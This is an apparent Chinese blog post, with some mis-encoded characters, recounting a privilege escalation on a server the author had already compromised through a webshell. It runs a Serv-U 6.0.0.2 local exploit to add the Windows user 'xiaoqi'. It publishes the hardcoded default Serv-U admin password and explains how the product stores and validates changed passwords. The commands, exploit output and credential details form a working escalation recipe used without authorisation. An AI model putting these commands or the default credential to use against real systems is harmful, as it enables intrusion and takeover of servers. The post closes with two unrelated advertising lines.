對(duì)Serv-U 6.0.0.2默認(rèn)帳戶及密碼的理解

今天獲得一個(gè)webshell.發(fā)現(xiàn)了serv-u目錄.看了下ServUDaemon.ini
[GLOBAL]
Version=6.0.0.2
OpenFilesDownloadMode=Exclusive
PacketTimeOut=300
LocalSetupPassword=ah6A0ED50ADD0A516DA36992DB43F3AA39

6.0.0.2版的.曾經(jīng)看到哪說(shuō)6.0版的默認(rèn)本地管理帳號(hào)和密碼依舊是原來(lái)那個(gè).可又好像聽(tīng)誰(shuí)說(shuō)過(guò)6版的密碼已經(jīng)改了..

呵.這里發(fā)現(xiàn).多出了一行Localsetuppassword.有種不詳?shù)念A(yù)感.難道原來(lái)的默認(rèn)密碼已經(jīng)通過(guò)它來(lái)設(shè)置了?加了MD5,算算純數(shù)字倒還是可以.機(jī)會(huì)渺茫..

試試能不能寫(xiě)入...顯示權(quán)限不足(一切都在預(yù)料之內(nèi)).OK試試默認(rèn)帳戶和密碼吧.

上傳了xiaolu的那個(gè)serv-u權(quán)限提升工具

netstat -an |find "43958"
TCP    127.0.0.1:43958        0.0.0.0:0              LISTENING

嗯,是這個(gè)口.

執(zhí)行命令

D:/web/www/XXXX_com/serv-u.exe 43958 "net user xiaoqi amen. /add " 
******************************************************
Serv-u <3.x Local Exploit by xiaolu
>221 Serv-U FTP Server v6.0 for WinSock ready...
>331 User name okay, need password.
******************************************************
#l@$ak#.lk;0@P
>530 Not logged in.
******************************************************

看到530,心涼了一下,這么說(shuō)來(lái)默認(rèn)密碼被改了.
上群里想獲得一下確認(rèn).Superhei給了個(gè)很好的思路.下載主程序用UEDIT查看密碼.
serv-u 6.0版之前要修改默認(rèn)密碼也是同樣的方法,而且密碼長(zhǎng)度要求同樣要求是14位(用其他字符替換
#l@$ak#.lk;0@P)..
打開(kāi)ServUAdmin.exe查了下,發(fā)現(xiàn)密碼依舊是
#l@$ak#.lk;0@P(特地復(fù)制到記事本觀察,防止0/O l/1等字符混淆).確實(shí)沒(méi)有變.
那么,看來(lái)Serv-u已經(jīng)不依靠它來(lái)驗(yàn)證了?
為了找出真像.下載了一個(gè)Serv-U 6.0.0.2版(未裝漢化,未破解,防止低版本漢化及破解補(bǔ)丁)


之前就在想,為什么Serv-U不可以提供一個(gè)讓管理員修改密碼的地方了?多少個(gè)服務(wù)器OVER的責(zé)任在Serv-U上啊?
好!這次來(lái)了,剛打開(kāi)serv-u admin,發(fā)現(xiàn)在"停止服務(wù)"下面多了一個(gè)"設(shè)置更改密碼"的按鈕.
再來(lái)看看ServUDaemon.ini,除了版本改變了以外,與原來(lái)并沒(méi)有不同之處.
回到控制臺(tái)點(diǎn)開(kāi)"設(shè)置更改密碼"要求輸入舊密碼,新密碼,確認(rèn).舊密碼?舊密碼是什么
?#l@$ak#.lk;0@P嗎?
提示密碼不正確..怪了.試了下空密碼...正確..這可把我郁悶了.難道在Serv-U 6.0.0.2里L(fēng)ocalAdministrator的密碼就是空???
把xiaolu的權(quán)限提升工具拿來(lái)改了下,把密碼改成空.編譯好重新傳了上去.

執(zhí)行命令

D:/web/www/XXXX_com/serv-u2.exe 43958 "net user xiaoqi amen. /add " 
******************************************************
Serv-u <3.x Local Exploit by xiaolu
>221 Serv-U FTP Server v6.0 for WinSock ready...
>331 User name okay, need password.
******************************************************
>530 Not logged in.
******************************************************

依然是530.呵..真是在做夢(mèng)啊我.不過(guò)這次失敗并不能代表默認(rèn)密碼不為空(因?yàn)檫@臺(tái)機(jī)器的配置文件中有LocalSetupPassword=)
好的.回過(guò)頭,看了下我機(jī)器上的ServUDaemon.ini,果然多了一行Localsetuppassword=xxxxxxx,看來(lái)確是剛才配置密碼的MD5了.把我機(jī)器上Serv-u的密碼改成空的(竟然允許我空的)再用這個(gè)serv-u2.exe試了下.不行..530,腦中突然閃過(guò),難道"空"就是
#l@$ak#.lk;0@P
操起serv-u.exe,yeah!成功.
到這里我們要開(kāi)始懷疑一個(gè)問(wèn)題了,如果修改了密碼,那么就需要進(jìn)行二次驗(yàn)證了?一次是
#l@$ak#.lk;0@P 一次是修改完的密碼.
呵..興沖沖地跟superhei說(shuō)了句"二次驗(yàn)證",修改了下那個(gè)權(quán)限提升工具,把其中的密碼改為我在Serv-U中設(shè)置的密碼,連上了.證明了沒(méi)有進(jìn)行二次驗(yàn)證.
總結(jié)一下,在Serv-U 6.0.0.2版本中,初始密碼依舊是
#l@$ak#.lk;0@P 但可以很方便地在Serv-U admin控制臺(tái)修改密碼,修改完密碼,配置保存在ServUDaemon.ini的LocalSetupPassword=中.
原來(lái)的
#l@$ak#.lk;0@P依舊保存只有當(dāng)密碼為空時(shí)使用.

另:要修改本地管理端口.只需要在ServUDaemon.ini中的[global]里加上一行LocalSetupPortNo=端口號(hào),既可

btw: 這些沒(méi)有技術(shù)含量的東西,希望大家多多原諒,原本寫(xiě)的一些東西只是想丟在blog里自己安慰安慰,大家轉(zhuǎn)載完實(shí)在是折煞我了.

北大青鳥(niǎo)網(wǎng)上報(bào)名
北大青鳥(niǎo)招生簡(jiǎn)章